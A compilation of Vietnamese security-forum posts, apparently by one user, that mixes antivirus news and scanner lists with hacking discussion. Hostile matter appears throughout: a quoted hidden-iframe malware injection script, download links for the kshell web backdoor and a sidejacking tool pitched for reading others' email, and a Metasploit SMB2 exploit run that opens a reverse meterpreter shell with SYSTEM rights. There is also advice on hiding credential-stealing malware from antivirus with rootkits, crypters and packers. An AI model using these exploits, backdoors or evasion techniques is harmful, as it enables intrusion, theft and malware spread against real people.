|
|
hkvietnam wrote:
sao website của em hay bị dính cái này
"<script>document.write('<iframe src="http://erapost.net/?click=13001125" width=100 height=100 style="position:absolute;top:-10000;left:-10000;"></iframe>');</script>"
Có ai biết vì sao không? chỉ em với ... hix....
có vẻ như ai đó đang muồn gắn Malware vào trang web của bạn
|
|
|
Mình thấy công cụ này rất hay nên post lên cho các bạn sử dụng
Microsoft Baseline Security Analyzer (MBSA) là tiện ích dò quét các lỗ hổng hệ thống thiếu an toàn trên Windows, đồng thời phát hiện những sản phẩm nào của hãng phần mềm này chưa được cập nhật các bản vá lỗi. Công cụ của Microsoft sẽ rất hữu ích với các nhà quản trị hệ thống và cả người dùng cá nhân.
http://technet.microsoft.com/en-us/security/cc184924.aspx
http://www.4shared.com/file/142089287/c80a640e/Microsoft_Baseline_Security_Analyzer_21.html
|
|
|
“Chấm điểm” Microsoft Security Essentials
ICTnews – Miễn phí, đơn giản, dễ sử dụng, khả năng “bắt” mã độc cao, tốn ít tài nguyên hệ thống… là những điểm mạnh của phần mềm diệt virus miễn phí mà Microsoft vừa ra mắt.
Đó cũng chính là lời giải thích vì sao bộ phần mềm mới lần đầu ra mắt này lại có tới hơn 1,5 triệu lượt tải ngay trong tuần đầu tiên mặc dù Microsoft chỉ cho phép những người đang sử dụng hệ điều hành Windows có bản quyền được phép tải về và sử dụng.
Nhiều chuyên gia phần mềm cũng như bảo mật trên thế giới đã chấm điểm Security Essentials của Microsoft. Theo họ, để được gọi là một bộ phần mềm bảo mật cao cấp, Security Essentials còn phải “phấn đấu rất nhiều”. Và đây là kết quả (được tính theo thang điểm 6):
Đánh giá tổng quát: 5 điểm
Tính năng và thiết kế giao diện: 3 điểm
Giá trị theo số tiền bỏ ra: 6 điểm (hoàn toàn miễn phí)
Độ dễ khi sử dụng: 5 điểm.
[img]http://www.ictnews.vn/Home/phan-mem/Cham-diem-Microsoft-Security-Essentials/2009/10/2SVCM1621790/ImageView.aspx?PublishedFileID=27878[/img]
Giao diện rất đơn giản và dễ sử dụng
Đúng như tên gọi của mình, Security Essentials chỉ bao gồm những tính năng rất “cơ bản” (essentials) nên sẽ là rất khập khiễng nếu so sánh nó với những phần mềm bảo mật thương mại cao cấp. Security Essentials không được tích hợp tường lửa (firewall), không có khả năng bảo vệ người dùng trên web, không quét email và chỉ có một số thiết lập rất “bình thường”.
Mã độc có thể tấn công chúng ta từ rất nhiều hướng, chúng vẫn phải đi qua một “cửa” gần như duy nhất: cài đặt các chương trình có khả năng tự hoạt động lên hệ thống của nạn nhân và đó là cách mà Security Essentials tập trung để chiến đấu. Nó sẽ tự động kiểm tra tất cả các file dữ liệu trong các quá trình tương tác và chặn đứng file nào chứa mã độc ngay khi chúng chuẩn bị “hành động”. Nếu muốn chắc ăn hơn nữa, người dùng có thể đặt lịch quét định kỳ hoặc bất thường để kiểm tra toàn bộ hệ thống.
Mặc dù phương pháp kiểm tra, phát hiện và ngăn chặn mã độc của Security Essentials được các chuyên gia bảo mật đánh giá là đã quá “cổ điển”, phần mềm này vẫn thể hiện sự hiệu quả cao đến không ngờ. Trong hầu hết các thử nghiệm, tỷ lệ mã độc vị Security Essentials phát hiện và ngăn chặn đạt tới 96%, ngang hàng với bộ phần mềm bảo mật có thu phí danh tiếng F-Secure Internet Security 2010.
Cũng bởi cơ chế làm việc đơn giản như vậy nên Security Essentials còn được đánh giá cao nhờ sự đơn giản trong quá trình sử dụng và tiêu tốn rất ít tài nguyên của máy tính. Trong một thử nghiệm của các chuyên gia bảo mật trong tạp chí tin học PC Pro (Anh), Security Essentials được cài đặt trên một chiếc máy tính chạy hệ điều hành Windows Vista và nó chỉ khiến dung lượng RAM cần tiêu thụ tăng từ mức 499 MB lên 583 MB – ít hơn 3MB so với bộ phần mềm bảo mật được đánh giá “nhẹ” nhất hiện nay là Avira Premium Security Suite.
Nhưng ngay sau ngày ra mắt, các chuyên gia của hãng bảo mật Symantec đã nhanh chóng “dội gáo nước lạnh” vào những hồ hởi của Microsoft khi phát hiện ra rằng: Security Essentials hoàn toàn không bảo vệ hệ thống trong thời gian đang khởi động (boot), thậm chí khi toàn bộ hệ thống đã “ổn định trật tự” được 7 giây Security Essentials mới bắt đầu hoạt động. Đây chưa phải là một điều quá tồi tệ nếu so sánh với khoảng thời gian15 giây mà Avira cần để khởi động, nhưng đó vẫn là khoảng thời gian “chết người” và vô cùng nguy hiểm trước sự khôn ngoan của những thế hệ mã độc ngày nay. Hơn nữa, Avira có nhiều thành phần cần phải khởi động hơn Security Essentials rất nhiều.
Nếu chưa có tiền mua những phần mềm bảo mật cao cấp, Security Essentials là một sự lựa chọn không hề tồi.
Khả năng phát hiện và ngăn chặn rootkit – chủng loại mã độc mới nhất và “hiếu chiến” nhất hiện nay của Security Essentials vẫn là một dấu hỏi lớn bởi nó không có khả năng quét và ngăn chặn trên nền tảng ảo của web.
Miễn phí và được cập nhật thư viện mã độc thường xuyên nhưng việc Microsoft đưa tính năng cập nhật của Security Essentials đi kèm với Windows Update là một sự thất vọng lớn đối với người dùng. Trong khi các phần mềm bảo mật khác được cập nhật hàng ngày, hàng giờ hay thậm chí là ngay lập tức sau khi phát hiện mã độc mới thì Security Essentials chỉ có thể bảo vệ người dùng trước những chủng mã độc mới sau… vài tuần do phải đợi được cập nhật cùng với Windows.
Đây cũng chính là lý do tại sao hầu hết các chuyên gia bảo mật trên thế giới khuyến cáo người dùng Internet không nên ỷ lại Security Essentials để trì hoãn việc mua các phần mềm cao cấp khác.
Nhưng nếu bạn chưa có tiền? Security Essentials cũng là một giải pháp bảo mật không tồi.
http://www.ictnews.vn/Home/phan-mem/Cham-diem-Microsoft-Security-Essentials/2009/10/2SVCM1621790/View.htm
|
|
|
demingcycle wrote:
Chào bạn,
Bạn mới vào có lớp 12 mà đã có những suy nghĩ chững chạc như vầy, tôi tin bạn sẽ thành công. Thú thật, lúc vào lớp 12 như bạn bây giờ, tôi chẳng có những suy nghĩ như vầy, chúc mừng.
Thật ra, khi đi làm, bạn sẽ thấy đơn giản hơn rất nhiều, không cần phải lo lắng lắm đâu. Theo mình, việc đầu tiên bạn cần là cố thi sao cho vào được Đại học ngành CNTT, đó đã là một thành công rồi, sau 4-5 năm học Đại học, bạn cố gắng học thật tốt những gì ở Đại học dậy, rồi cố gắng tốt nghiệp ĐH loại khá hay giỏi gì đấy, rồi đi làm. Và khi đi làm rồi, bạn sẽ không còn thấy phức tạp như mình suy nghĩ như bây giờ.
Điều cần nhắn nhủ là: Nếu muốn theo ngành CNTT, thì cố gắng thi vào ĐH CNNT trước và học thật tốt các môn ở trường dậy.
Vài điều muốn chia sẻ, chúc vui.
Thân.
cảm ơn bác demingcycle vì những lời khuyên rất hay của bác
@kiki9999: đúng như lời demingcycle nói,:"muốn theo ngành CNTT, thì cố gắng thi vào ĐH CNNT trước và học thật tốt các môn ở trường dạy"
bạn cố gắng lên nhé,vì năm nay mình cũng học lớp 12,mà hình như trong HVA cũng có 1 số bác như Mr.kas,freeze_love bữa nay không thấy ,chắc mắc luyện thi
|
|
|
Bướm Đêm wrote:
dùng cái http://www.prorat.net/downloads.php đi các pác , mật khẩu giải nén bản demo này là pro, còn bản thương mại thì hem mua được đâu, nó bán bằng cách ma wy~ gi` í :-s
@bướm đêm: cái này là hàng của thổ,mà tụi thổ cũng tà không kém,tự code là hay nhất
|
|
|
ninhnam12 wrote:
Cái mà bạn muốn có tên là SPY-Net [rat]1.8.
Nếu muốn hướng dẫn sử dụng thì pm nick mình nha .
nick : duoc_roi_iou
@ninhnam12 : SPY-Net [rat]1.8 là 1 dạng back-door và trên các diễn đàn về "Mã Độc" của thế giới đã cảnh báo về nó:
cảnh báo của 1 số diễn đàn
I just want to warn you about Spy-Net RAT, yes its backdoored by its owner and i wanna proove that and let the pictures talk
This picture have been captured from wireshark. Its a program that analysis all the data that transfered via your computer
The data transfered to this DYNDNS Address as shown in pictures spynet-rat2.dyndns.org after the server open.
Important Notice :
The Program (Spy-Net RAT) Itself is not Binded
The Server made by it is Binded
PS: ai đang xài SPY-Net [rat]1.8 thì nên gỡ bỏ đi kẻo nó OWNED máy mình thì khổ ,chỉ có mấy thằng noob mới xài nó thôi
|
|
|
soyoojin wrote:
Cả tuần nay, mạng nhà em không thể vào được trang sinhvienquynhon.info, cả google cũng không vào được, nhưng vào yahoo thì vẫn bình thường. Nói chung là những server nước ngoài thì không thể vào được, còn những server trong nước thì vẫn chạy tốt, mà dường như chạy nhanh hơn bình thường. Em đang dùng cước trọn gói của vnpt.
Mấy bác giúp em!
{gmail:toancm2009@gmail.com
YM:cry_zaizai}
@soyoojin: mình cũng xài mạng VNPT và vào các trang sinhvienquynhon.info và google.com đều bình thường
|
|
|
vừa vào remote-exploit forums thấy topic thảo luận của bác vikjava,ai chưa biết thì vào đọc luôn nhé:
http://forums.remote-exploit.org/newbie-area/27308-how-save-config-after-reboot-backtrack-4-a.html
|
|
|
http://www.vnsecurity.vn/index.php?option=com_content&view=article&id=54:local-by-pass-server-windows-with-kshell&catid=39:hacking&Itemid=58
download ksh3ll:
http://www.guru.net.vn/kshell_1.1.zip
http://www.guru.net.vn/kshell_1.2.zip
nó là 1 dạng back-door tương tự như c99 hoặc r57,nhưng chỉ hoạt động trên các server chạy win(trong môi trường ASP.net) còn linux thì "miễn dịch"
|
|
|
ORA2009 wrote:
SuperDragon wrote:
Trong diễn đàn có ai biết phần mềm hỗ trợ down load chạy trên Redhat mà cài không quá phức tạp không ạ?Em google ra mấy cái nhưng hình như phải cài cả trình biên dịch gì đó nữa
Redhat là phần mềm nào vậy bạn nhỉ ?
Nếu dùng Firefox on Linux/Windows bạn có thể xài với DownThemAll ! Tool để hỗ trợ download.
https://addons.mozilla.org/en-US/firefox/addon/201
|
|
|
mechk wrote:
holiganvn wrote:
clackent wrote:
Hiện tại mình có một con kshell trên 1 trang web.
Trang web này phân quyền khá kỹ . Không thể nào xem được thư mục khác ngoài thư mục trong website của mình.
Mình có thể chạy được command promt nhưng lại không thể tạo user mới bằng cmd này .Hầu như mình chỉ được quyền read mà thôi.
Vậy cho mình hỏi có cách nào có thể local được một server như thế này không.
Rất mong mọi người cho ý kiến
local từ thập niên 90 chừ mà bác còn xài à,nếu muốn local thành công thì cố gắng học 1 chút về *nix,về các câu lệnh command line(trong HVA có topic rồi,bác tìm đi)
pS:sao toàn bác đi "sau thời đại" cả thế nhỉ
đâu phải web server nào cũng dùng *.nix hả bác,mà ko hiểu kĩ thuật "thời đại bây giờ" thì dùng kĩ thuật gì nhỉ ?
không,ý mình là muốn "tấn công" 1 webserver thì có nhiều đường,tại sao phải cứ local hoài nhỉ,chả lẽ đường vào webserver chỉ có "lối mòn" đó,chưa kể bữa nay các webserver config khá kĩ,lâu lâu mới kiếm được 1 cái mà thực hành
/hvaonline/posts/list/31061.html
|
|
|
Ngoài chuyện miễn phí, điều thú vị của các công cụ quét virus trực tuyến là không cần cài đặt cả phần mềm diệt virus nặng nề làm ảnh hưởng đến tốc độ máy tính.
Các công cụ quét trực tuyến dựa trên công nghệ ActiveX hoặc Java, chúng chỉ cài một ứng dụng rất nhỏ lên máy tính để quét và không ảnh hưởng gì đến tốc độ xử lý của máy tính.
Đây là danh sách 10 công cụ quét virus trực tuyến đáng tin cậy.
1. Công cụ quét trực tuyến của Trend Micro
Trend Micro HouseCall là ứng dụng kiểm tra máy tính trực tuyến để phát hiện virus, spyware và các loại mã độc khác. Ngoài ra, HouseCall còn kiểm tra máy tính để phát hiện và vá các lỗ hổng tiềm ẩn nguy cơ tấn công.
http://housecall.trendmicro.com/
2. Kaspersky Online Scanner
Công cụ quét virus trực tuyến Kaspersky Online Virus Scanner dùng để quét máy tính để phát hiện các mã độc. Đặc biệt, tỷ lệ phát hiện mã độc của công cụ này được đánh giá có hiệu quả ngang với các sản phẩm thương mại của Kaspersky. Công cụ quét virus trực tuyến này rất mạnh và quét máy tính rất sâu, có thể kéo dài vài giờ mới hoàn thành, vì vậy bạn nên quét những lúc máy tính sử dụng ít ứng dụng.
http://www.kaspersky.com/virusscanner
3. Quét trực tuyến với ESET
Công cụ ESET Online Scanner là ứng dụng quét virus miễn phí tốt nhất trên web hiện nay. Đây là công cụ mạnh, giao diện thân thiện, có thể loại bỏ mã độc như viruses, spyware, adware, sâu và Trojans từ bất kỳ máy tính nào chỉ với một trình duyệt web, không cần cài đặt. Công cụ này sử dụng công nghệ ThreatSense và cơ sở dữ liệu mẫu mã độc như công cụ có phí ESET NOD32 Antivirus, có nghĩa là nó luôn được cập nhật.
http://www.eset.com/onlinescan/
4. Quét virus trực tuyến Bifdefender
BitDefender Online Scanner là công cụ quét virus theo yêu cầu. Bạn có thể dùng công cụ này để quét bộ nhớ, các file và vùng khởi động.
http://www.bitdefender.com/scanner/online/free.html
5. Avast! Online Scanner
Đây là công cụ quét virus trực tuyến có khả năng kiểm tra các file bên trong máy tính một cách nhanh chóng và miễn phí.
http://onlinescan.avast.com/
6. Live Onecare
Live Onecare là công cụ quét mã độc của Microsoft được thiết kế giúp bảo vệ sức khỏe máy tính chạy hệ điều hành Windows. Công cụ này có thể kiểm tra và loại bỏ virus, loại bỏ những file không cần thiết bên trong ổ cứng và cải thiện hiệu xuất của máy tính.
http://onecare.live.com/site/en-us/default.htm
7. F-Secure Online Scanner
Công cụ quét virus trực tuyến F-Secure Online Virus Scanner (phiên bản 3.3) là dịch vụ miễn phí, có thể phát hiện và diệt virus lây nhiễm bên trong máy tính. Sản phẩm này sẽ tự động tải các thành phần cần thiết và cơ sở dữ liệu mẫu nhận diện virus khi nó được khởi động.
http://www.f-secure.com/en_EMEA/security/security-lab/tools-and-services/online-scanner/index.html
8. Virustotal
VirusTotal là dịch vụ phân tích các file đáng ngờ, có thể phát hiện nhanh virus, sâu, Trojans và tất cả các loại mã độc khác. Đây là dịch vụ miễn phí, sử dụng nhiều bộ máy diệt virus, tự động cập nhật mẫu nhận diện virus trong thời gian thực.
http://www.virustotal.com/sobre.html
9. Panda ActiveScan 2.0
ActiveScan 2.0 là công cụ quét trực tuyến nâng cao dựa trên công nghệ quét “đám mây” Collective Intelligence của hãng bảo mật Panda để phát hiện mã độc.
http://www.pandasecurity.com/homeusers/solutions/activescan/
10. Quét trực tuyến với McAfee
McAfee FreeScan sẽ giúp bạn phát hiện hàng nghìn virus trên máy tính. Dựa trên bộ máy nhận diện virus McAfee VirusScan, công cụ FreeScan có thể tìm virus, gồm cả những virus mới nguy hiểm nhất đang phát tán trên mạng và hiển thị danh sách các file bị nhiễm. Khi phát hiện được virus, FreeScan còn cung cấp cả các liên kết để tìm hiểu thêm thông tin về những virus đó và chỉ dẫn cách giúp bạn làm sạch hệ thống máy tính.
http://home.mcafee.com/StaticGenericPage.aspx?page=cookienotsupported&url=%2fDownloads%2fFreeScan.aspx%3fctst%3d1
Theo ICTNews (Bablotech)
http://quantrimang.com/hethong/thu-thuat/60739_10-cong-cu-quet-virus-truc-tuyen-mien-phi.aspx
|
|
|
bachduong051 wrote:
Hi các bạn!
Mình có chút vấn đề xin phép hỏi thăm ý kiến của các bạn trong HVA.
Mình có lập một cái blog wordpress,chỉ dành cho hai người đọc nên mình đã ở chế độ riêng tư là chỉ dành cho những user mình add.Mình đã đặt hỏi user và pass mỗi khi truy cập vào blog.
Một lần bạn mình xài nhờ máy bạn xài nhờ net để vào trang blog này.Có lẽ do bạn mình đã duyệt băng FF hay trình duyệt j đó để chế độ save pass nên đứa bạn đó vào được trang blog của hai đứa mình.
Mình đã thử đổi pass login nhưng nó vẫn vào được.
Có ai biết được về wordpress thì chỉ giùm mình với.Lưu ý là mình không up wordpress lên host riêng ,mà đang xài tạm wordpress tên miền do nhà dịch vụ cung cấp.
Các bạn chỉ giúp mình với nhé!mình cũng ít tọc vạch bên mấy vụ blog nì!
Cám ơn các bạn nhiều!
bạn thử edit info ,ví dụ như e-mail thay thế và 1 số thông tin khi đăng kí blog wordpress
|
|
|
lenon wrote:
Hi, Bro ơi, mình đọc đoạn code đó rồi nhưng ko bik dùng làm sao á?
http://trac.metasploit.com/browser/framework3/trunk/modules/exploits/windows/smb/smb2_negotiate_func_index.rb
Mình có một số thắc mắc này nè :
- Ngôn ngữ sử dụng
- Trình biên dịch
Mình đang học tập ở HVA nhưng nhiều bài viết ko rõ ngôn ngữ và trình biên dịch như thế nào, download ở đâu nữa.
Sau này các Bro viết bài mong các Bro lưu tâm cho những Newbie như bọn mình nhé. Thank nhiều !
@lenon: xin lỗi bạn,mấy ngày nay bão đứt dây điện thoại nên không lên mạng được
-- http://trac.metasploit.com/browser/framework3/trunk/modules/exploits/windows/smb/smb2_negotiate_func_index.rb
đoạn code trên được viết bằng "ngôn ngữ lập trình ruby"
http://vi.wikipedia.org/wiki/Ruby_(ng%C3%B4n_ng%E1%BB%AF_l%E1%BA%ADp_tr%C3%ACnh)
http://www.ruby-lang.org/en/
đoạn code trên được viết dùng để exploit lỗ hổng Windows SMB2,nó chỉ là 1 moudle được add vào metasploit để khai thác,nếu bác không biết add exploit code này,bác có thể cập nhật online cho metasploit,ví dụ(trong linux):
Code:
holiganvn@holiganvn:/opt$ su root
Password:
root@holiganvn:/opt# cd /opt
root@holiganvn:/opt# ls
lampp metasploit nessus ruby
root@holiganvn:/opt# cd metasploit
root@holiganvn:/opt/metasploit# ls
framework3
root@holiganvn:/opt/metasploit# cd framework3
root@holiganvn:/opt/metasploit/framework3# ls
data modules msfelfscan msfopcode msfrpcd scripts
documentation msfcli msfencode msfpayload msfweb tools
external msfconsole msfgui msfpescan plugins
lib msfd msfmachscan msfrpc README
root@holiganvn:/opt/metasploit/framework3# svn update
....
U modules/exploits/windows/lpd/wincomlpd_admin.rb
A modules/exploits/windows/http/adobe_robohelper_authbypass.rb
U modules/exploits/windows/http/mdaemon_worldclient_form2raw.rb
U modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb
U modules/exploits/windows/browser/apple_quicktime_rtsp.rb
U modules/exploits/windows/browser/macrovision_unsafe.rb
U modules/exploits/windows/browser/systemrequirementslab_unsafe.rb
U modules/exploits/windows/browser/winzip_fileview.rb
U modules/exploits/windows/browser/ie_unsafe_scripting.rb
U modules/exploits/windows/browser/owc_spreadsheet_msdso.rb
U modules/exploits/windows/browser/juniper_sslvpn_ive_setupdll.rb
U modules/exploits/windows/browser/symantec_appstream_unsafe.rb
A modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb
U modules/exploits/windows/browser/ie_createobject.rb
U modules/exploits/windows/browser/ms08_041_snapshotviewer.rb
U modules/exploits/windows/browser/autodesk_idrop.rb
A modules/exploits/windows/nfs
A modules/exploits/windows/nfs/xlink_nfsd.rb
U modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb
A modules/exploits/windows/fileformat/emc_appextender_keyworks.rb
U modules/exploits/windows/fileformat/videolan_tivo.rb
U modules/exploits/windows/ftp/sasser_ftpd_port.rb
A modules/exploits/windows/ftp/xlink_client.rb
U modules/exploits/windows/ftp/warftpd_165_pass.rb
U modules/exploits/windows/ftp/freeftpd_user.rb
U modules/exploits/windows/ftp/proftp_banner.rb
U modules/exploits/windows/ftp/warftpd_165_user.rb
U modules/exploits/windows/ftp/wsftp_server_503_mkd.rb
A modules/exploits/windows/ftp/xlink_server.rb
U modules/exploits/windows/driver/dlink_wifi_rates.rb
A modules/exploits/windows/motorola
A modules/exploits/windows/motorola/timbuktu_fileupload.rb
U modules/exploits/windows/vpn/safenet_ike_11.rb
U modules/exploits/windows/smb/smb_relay.rb
U modules/exploits/windows/smb/psexec.rb
A modules/exploits/windows/smb/smb2_negotiate_func_index.rb
U modules/exploits/windows/iis/ms01_023_printer.rb
U modules/exploits/windows/imap/mercury_rename.rb
U modules/exploits/windows/imap/mdaemon_fetch.rb
U modules/exploits/windows/brightstor/universal_agent.rb
A modules/exploits/windows/misc/bigant_server_250.rb
U modules/exploits/windows/misc/fb_svc_attach.rb
U modules/exploits/windows/misc/ib_svc_attach.rb
A modules/exploits/windows/misc/sap_2005_license.rb
U modules/exploits/windows/misc/fb_isc_create_database.rb
U modules/exploits/windows/misc/fb_isc_attach_database.rb
U modules/exploits/windows/misc/ib_isc_create_database.rb
U modules/exploits/windows/misc/ib_isc_attach_database.rb
U modules/exploits/windows/misc/videolan_tivo.rb
U modules/exploits/windows/misc/eiqnetworks_esa.rb
U modules/exploits/windows/ssh/putty_msg_debug.rb
U modules/exploits/windows/mssql/ms02_056_hello.rb
U modules/exploits/windows/oracle/tns_service_name.rb
U modules/exploits/windows/oracle/tns_arguments.rb
U modules/exploits/windows/firewall/kerio_auth.rb
...
Updated to revision 7123.
trên là các exploit của windows mình đã cập nhật xong cho metasploit
--chạy metaploit sau khi cập nhật xong:
Code:
root@holiganvn:~$ msfconsole
_ _ _ _
| | | | (_) |
_ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
| | | | | | __/ || (_| \__ \ |_) | | (_) | | |_
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
| |
|_|
=[ msf v3.3-dev [core:3.3 api:1.0]
+ -- --=[ 412 exploits - 261 payloads
+ -- --=[ 21 encoders - 8 nops
=[ 191 aux
|
|
|
PM virus miễn phí của Microsoft: “Rất tốt”
ICTnews - Security Essentials, phần mềm diệt virus miễn phí của Microsoft phát hiện được 98% mẫu virus, tỷ lệ thành công được hãng bảo mật AV-Test.org miêu tả là "rất tốt".
Phần mềm bảo mật miễn phí Security Essentials của Microsoft đã phát hiện được 98% trong số hơn nửa triệu mẫu mã độc, một tỷ lệ được hãng AV-Test.org đánh là là “rất tốt”.
AV-Test.org, hãng bảo mật Đức, đã tiến hành thử nghiệm chất lượng của Security Essentials, phần mềm chống mã độc miễn phí của Microsoft ra mắt hôm 29/9 dành cho các hệ điều hành Windows XP Service Pack 3 (SP3), Vista SP2 và hệ điều hành sắp ra mắt Windows 7.
Thử nghiệm đầu tiên là cho Security Essentials “thử lửa” với hơn 3.700 virus, Trojans và sâu lấy trong danh sách Wildlist (nơi thu thập các mối đe dọa đã tấn công vào các máy tính toàn cầu) gần đây nhất. “Tất cả các mẫu virus này đã được phần mềm của Microsoft phát hiện và chặn thành công", Andreas Marx, giám đốc của AV-Test.org cho biết trong một email.
Trong thử nghiệm thứ hai, Security Essentials phải đối phó với lượng mã độc lớn hơn. Trong số 540.344 mã độc được AV-Test.org thu thập, phần mềm của Microsoft đã phát hiện được 536,535 mẫu, tức khoảng 98,4%, một kết quả được Andreas Marx miêu tả là “tỷ lệ phát hiện rất tốt”.
Trong thử nghiệm sau đó với phần mềm adware và spyware, Security Essentials (cũng có tính năng quét spyware) đã phát hiện được 12.935 trong số 14.222 mẫu, đạt tỷ lệ phát hiện là 90,9%. Ngoài ra, Security Essential cũng đã phát hiện và diệt được 25 rootkit.
Nhưng cũng có một số thứ phần mềm của Microsoft có vấn đề trong khả năng xử lý. Hầu hết phần mềm bảo mật hiện nay có khả năng phát hiện mã độc theo hành vi, tức là quét mã độc dựa trên kinh nghiệm không phải là dựa trên dấu hiệu đặc biệt để phát hiện ra mối đe dọa tiềm ẩn. Security Essentials lại thiếu công nghệ này. “Chúng tôi nhận thấy không một mẫu virus nào được Security Essentials phát hiện dựa trên các hành vi đáng ngờ”, Andreas Marx cho biết.
Một vấn đề nữa là Security Essentials cũng đã làm chết cứng máy tính khi nó phát hiện và diệt mã độc. “Trong nhiều trường hợp, các dấu vết của lây nhiễm vẫn còn”, Marx nói, đồng thời cho biết phần mềm diệt virus của Microsoft còn xóa rỗng cả các đầu mục “Run” trong Windows registry và sửa đổi cả các file “hosts”. Chương trình diệt virus của Microsoft cũng thất bại trong việc bật tường lửa Windows sau khi đã bị một mã độc vô hiệu hóa.
|
|
|
clackent wrote:
Hiện tại mình có một con kshell trên 1 trang web.
Trang web này phân quyền khá kỹ . Không thể nào xem được thư mục khác ngoài thư mục trong website của mình.
Mình có thể chạy được command promt nhưng lại không thể tạo user mới bằng cmd này .Hầu như mình chỉ được quyền read mà thôi.
Vậy cho mình hỏi có cách nào có thể local được một server như thế này không.
Rất mong mọi người cho ý kiến
local từ thập niên 90 chừ mà bác còn xài à,nếu muốn local thành công thì cố gắng học 1 chút về *nix,về các câu lệnh command line(trong HVA có topic rồi,bác tìm đi)
pS:sao toàn bác đi "sau thời đại" cả thế nhỉ
|
|
|
http://trac.metasploit.com/browser/framework3/trunk/modules/exploits/windows/smb/smb2_negotiate_func_index.rb
tấn công bằng metaploit:
-------------------------------------------------------------------------
Code:
holiganvn@holiganvn:~$ msfconsole
| | _) |
__ `__ \ _ \ __| _` | __| __ \ | _ \ | __|
| | | __/ | ( |\__ \ | | | ( | | |
_| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|
_|
=[ msf v3.3-dev
+ -- --=[ 402 exploits - 248 payloads
+ -- --=[ 21 encoders - 8 nops
=[ 182 aux
msf> use exploit/windows/smb/smb2_negotiate_func_index
msf (exploit/smb2) > set PAYLOAD windows/meterpreter/reverse_tcp
msf (exploit/smb2) > set LHOST 192.168.0.136
msf (exploit/smb2) > set LPORT 5678
msf (exploit/smb2) > set RHOST 192.168.0.211
msf (exploit/smb2) > exploit
[*] Started reverse handler
[*] Connecting to the target (192.168.0.211:445)...
[*] Sending the exploit packet (854 bytes)...
[*] Waiting up to 180 seconds for exploit to trigger...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 2 opened (192.168.0.136:5678 -> 192.168.0.211:49158)
meterpreter > sysinfo
Computer: WIN-UAKGQGDWLX2
OS : Windows 2008 (Build 6001, Service Pack 1).
Arch : x86
Language: en_US
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
|
|
|
jforum3000 wrote:
Vẫn đang là bản beta, Microsoft vẫn còn việc phải làm đấy. Mình thì quen dùng avira rồi, miễn phí, nhẹ, hiệu quả.
thế không phải bác bữa nay chuyển sang xài *nix à
|
|
|
NGUYEN_PHONG1990 wrote:
Lab ACNS session hijacking bằng hamster và ferret
http://tailieu.athena.edu.vn/ACNS-Athena%20Certified%20Network%20Security%28Sec+%29/Lab%20ACNS%20%28Sec+%29/session%20hijacking%20by%20hamster%20and%20ferret/session%20hijacking%20by%20hamster%20and%20ferret.swf
@NGUYEN_PHONG1990:cái này bác post vào box "tài liệu hữu ích" thì đúng hơn,còn session hijacking bằng hamster và ferret để đọc trộm e-mail qua wifi thì hay thật.
http://www.erratasec.com/sidejacking.zip
các bác nhớ cài wincap
|
|
|
Microsoft sẽ chính thức bước chân vào thị trường phần mềm diệt virus miễn phí từ ngày hôm nay (29/9) bằng phần mềm diệt virus mang tên Security Essentials.
Tuy nhiên, hiện người dùng vẫn chưa thể tải phiên bản này về nhưng sẽ có thể tải về từ trang Security Essentials của Microsoft. Phiên bản này sẽ tương thích với các hệ điều hành Windows XP, Vista và Windows 7 sẽ phát hành vào 22/10 tới.
Cuối năm ngoái, lần đầu tiên Microsoft công bố Security Essentials với tên mã là Morro như một phần mềm diệt virus miễn phí thay thế cho phiên bản tính phí Windows Live oneCare. Thông báo này đã làm chán nản thị trường phần mềm diệt virus miễn phí và dẫn đến nhiều băn khoăn về việc rồi Microsoft sẽ thống trị thị trường bảo mật máy tính hay không.
Trong tháng 6 vừa rồi, Microsoft đã công khai bản thử nghiệm Security Essentials nhưng với số lượng giới hạn. Phiên bản này được thiết kế tốt và dễ sử dụng. Giao diện chính sử dụng một cửa sổ đơn với 4 tab và thanh trạng thái được mã hóa theo màu sắc nằm dọc trên đỉnh giao diện. Vì vậy người dùng có thể nhìn thấy nếu máy tính được bảo vệ.
Phiên bản thử nghiệm Security Essentials cũng thay thế 1/4 phần mềm diệt virus miễn phí gần đây. Phiên bản thử nghiệm Microsoft Security Essentials đã phát hiện được 97,8% mã độc trong những lần kiểm thử bởi hãng AV-Test.org và được đánh giá khá tốt so với các công cụ diệt virus miễn phí hiện nay.
Theo chuyên gia Erik Larkin, nếu Microsoft có thể cải thiện tỉ lệ phát hiện và tốc độ quét nhanh hơn nữa trước khi phiên bản cuối cùng được tung ra, Security Essentials sẽ trở thành đối thủ thực sự trong thị trường phần mềm diệt virus miễn phí.
http://www.microsoft.com/security_essentials/
http://www.quantrimang.com.vn/baomat/bao-mat/tin-bao-mat/60592_Microsoft_ra_mat_phan_mem_diet_virus_mien_phi.aspx
|
|
|
@smallbutsuper: nếu mày victim mà có cài BKAV thì cũng sẽ có kết quả như trên máy bạn thôi,tốt nhất là sử dụng các "phần mềm đánh cắp" khác và biết cách "bảo vệ" nó qua mặt các Anti-virus như: sử dụng rootkit,Crypters,packers,joiners....
|
|
|
ngày mai Bão vô là cũng là ngày 29.9 rồi,phần mềm diệt virus mới sắp ra mắt chừng nào mà BKAV IS 2009 mà vượt qua được cuộc sát hạch của virus Bulletin thì may ra lúc đó mới được sử dụng rộng rãi,nhưng xem ra khá bất khả thi vì mấy "đại ca" như symantec mà còn trượt nữa là
|
|
|
gamar wrote:
các bác cho em hỏi 1 câu:
member như thế nào, có điều kiện gì thì mới dược vào 1 số group như Elite member, Researcher, Ky thuat vien ...
Thanks
trình độ và thái độ
|
|
|
em muốn tham khảo xem các bác trong HVA xài distro linux gì ,hiện em đang xài ubuntu 9.04 và b4ck - track 4
|
|
|
mình xài Adblock plus và no-script
|
|
|
cũng có thể là KIS 2010 ,xem đoạn quảng cáo có thành long nè:
http://www.youtube.com/watch?v=kbRSQVsOX_Y&feature=related
|
|
|
chắc hẳn trong chúng ta ai cũng đã từng xài những đoạn exploit được viết bằng ngôn ngữ perl,đây là 1 tài liệu rất hay hướng dẫn bạn từng bước để viết được 1 exploit bằng ngôn ngữ perl,gồm các phần sau:
01: Introduction
02: Basics
03: Arrays
04: Conditionals
